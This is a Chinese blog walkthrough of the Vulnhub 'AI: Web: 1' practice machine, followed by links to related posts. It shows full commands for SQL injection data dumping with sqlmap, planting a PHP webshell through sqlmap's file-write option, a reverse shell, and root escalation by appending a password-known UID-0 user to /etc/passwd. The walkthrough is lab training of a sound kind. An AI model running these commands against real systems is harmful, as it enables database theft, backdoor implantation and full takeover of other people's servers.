Vulnhub靶机AI:Web:1

于 2024-09-08 16:45:22 发布
阅读量411 收藏 6
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74631795/article/details/142025578
版权

一、环境准备

1.靶机下载

https://www.vulnhub.com/entry/ai-web-1,353/

2.网络配置

kali攻击机和靶机均采用桥接模式,使用手机热点

二、信息收集

1.网络主机发现

sudo arp-scan -l

kali:192.168.110.235

靶机:192.168.110.135

2.目标主机扫描

sudo nmap -sS -sV -O -p- 192.168.110.135

开放端口:80

操作系统:linux

访问80端口,没有东西

3.网站目录扫描

3-1

dirsearch -u http://192.168.110.135/

访问robots.txt

发现两个目录,继续访问

访问失败

3-2

dirsearch -u http://192.168.110.135/m3diNf0/

3-3

dirsearch -u http://192.168.110.135/se3reTdir777

注:这里用dirsearch 扫不出来index.php,用dirb可以

dirb http://192.168.110.135/se3reTdir777

总结:发现info.php, index.php

4.访问目录

info.php

泄露了根路径

index.php

输入1,正常返回:

输入1‘,出现异常,怀疑存在sql注入漏洞:

三、漏洞利用

1、使用burpsuite抓包,并保存为txt文件

2.使用sqlmap验证

2-1

sqlmap -r 1.txt --batch

2-2查数据库

sqlmap -r 1.txt --batch --dbs

2-3查表

2-4查字段

sqlmap -r 1.txt --batch -D aiweb1 -T systemUser --columns

2-5爆破内容

sqlmap -r 1.txt --batch -D aiweb1 -T systemUser -C "id,passwd,userName" --dumps

暂时没看到有用的信息

3.利用sqlmap上传shell

3-1准备一句话木马

3-2写入shell

路径为刚才info.php泄露的根路径

sqlmap -r 1.txt --file-write ./test.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/test.php

3-3验证shell写入是否成功

已经存在test.php,证明上传成功

4.使用蚁剑连接

无权限查看root内容,下一步需要提权

四、提权

4-1反弹shell

Linux下几种反弹Shell方法的总结与理解 - FreeBuf网络安全行业门户

有些方法可以反弹成功,但是执行命令后没有反应

选用php连接脚本

利用蚁剑上传这个连接脚本

kali开启监听

在虚拟终端执行脚本,kali监听成功

4-2查找可写文件

find / -writable -type f 2>/dev/null

发现可写入/etc/passwd

4-3添加新用户实现提权

生成密码

openssl passwd -1 -salt test 123456

写入/etc/passwd文件中

echo 'newtest:$1$test$at615QShYKduQlx5z9Zm7/:0:0::/root:/bin/bash' >> /etc/passwd

4-4切换用户

出现错误 "must be run from a terminal"

使用" script /dev/null",成功切换

已经是root权限

五、夺flag

Aurora Dream极光之梦
关注
Vulnhub靶机AI-Web-1.0
羊柳树的博客
01-20 4265
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
vulnhub——Ai-Web1靶机渗透
qq_63034068的博客
07-20 971
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns #列出字段。sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables #列出表。我们再去扫一下另一个路径,我们看到了一个php文件。
vulnhub靶机:AI: Web: 1
weixin_52450702的博客
10-23 495
靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/实验时间:2022.10.22这是我第一次写vulnhub靶机的渗透文章,其中部分有参考网上师傅们的文章,尽管这样还是在实验中出现了各种问题,以后会经常更新以下为本次靶机渗透的全部思路。
Vulnhub——AI: WEB: 1
流水不争先,争的是滔滔不绝
06-18 634
(1)OS-shell,Openssl的利用(2)Linux /etc/passwd文件写入root用户进行提权
VulnHub靶机 - AI:Web 2.0
狂吃三碗
04-28 592
VulnHub靶机 - AI:Web 2.0
Vulnhub靶机AI-WEB-1.0
weixin_68416970的博客
05-22 1143
Vulnhub靶机AI-WEB-1.0。AI-WEB-1.0是一个专门设计用来测试渗透测试者技能的靶机。这个靶机的目标是从/root/flag.txt获取flag,获得低权限的shell,然后将权限提升到root。
Vulnhub靶机渗透之 AI: Web: 1
_Co1a
07-21 1220
靶机下载地址:AI:Web:1 Description: Difficulty: Intermediate Network: DHCP (Automatically assign) Network Mode: NAT This box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privi
vulnhub靶机AI:WEB:2
weixin_52450702的博客
10-24 318
在此介绍dirbuster,直接在终端输入dirbuster回车后出现以下界面,填上url和选择字典即可开始扫描,字典所在位置是/usr/share/dirbuster/wordlists。对扫描到的目录进行访问,都是拒绝访问,再次登录192.168.70.152,看到welcome xuezhuli filesharing,去漏洞平台搜索一下。进行注册然后登录,发现页面源码的注释内容,注释掉了上传文件的代码,没什么用。发现webadmin进行访问,发现需要密码,输入刚刚解密出的密码,成功登录。
vulnhub靶机AI-Web2渗透笔记
liver100day的博客
07-24 2164
文章目录环境准备渗透过程1.信息收集1.1 主机发现1.2 端口扫描1.3 访问web网页(80端口)2.漏洞利用1 利用目录穿越(Directory Traversal)漏洞读取/etc/passwd2.利用暴力破解获取密码4 获得目标shell提权 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-2,357/ 渗透过程 1.信息收集 1..
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2368
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8486
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
南京工业大学在辽宁2020-2024各专业最低录取分数及位次表.pdf
10-04
那些年,与你同分同位次的同学都去了哪里?全国各大学在辽宁2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
下单系统的Spnigboot和微信小程序实现(全栈微信小程式下单).zip
10-04
下单系统的Spnigboot和微信小程序实现(全栈微信小程式下单)
基于Java开发的智能文件管家设计源码
最新发布
10-04
该项目是一款基于Java的智能文件管家设计源码,涵盖102个文件,包括29个Java源文件、27个类文件、19个XML配置文件、10个YAML文件、8个列表文件、4个属性文件、4个JAR包文件以及1个Git忽略文件。该系统旨在提供高效便捷的文件管理解决方案。
基于YoloV8的简单目标检测和跟踪,使用KMNET进行鼠标移动(处理多目标移动抖动,处理鼠标平滑移动).zip
10-04
基于YoloV8的简单目标检测和跟踪,使用KMNET进行鼠标移动(处理多目标移动抖动,处理鼠标平滑移动)
基于Vue和JavaScript的心旅途个性化推荐旅游平台设计源码
10-04
本项目是一款基于Vue和JavaScript开发的心旅途个性化推荐旅游平台设计源码,整合了513个Java文件、76个PNG图片、70个XML配置文件、62个JavaScript文件、42个Vue组件文件、28个CSS样式文件、22个HTML文件、18个YAML配置文件、16个属性文件、11个Vue模板文件,总计919个文件。平台采用现代化前端技术堆栈,旨在为用户提供个性化的旅游推荐服务。
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值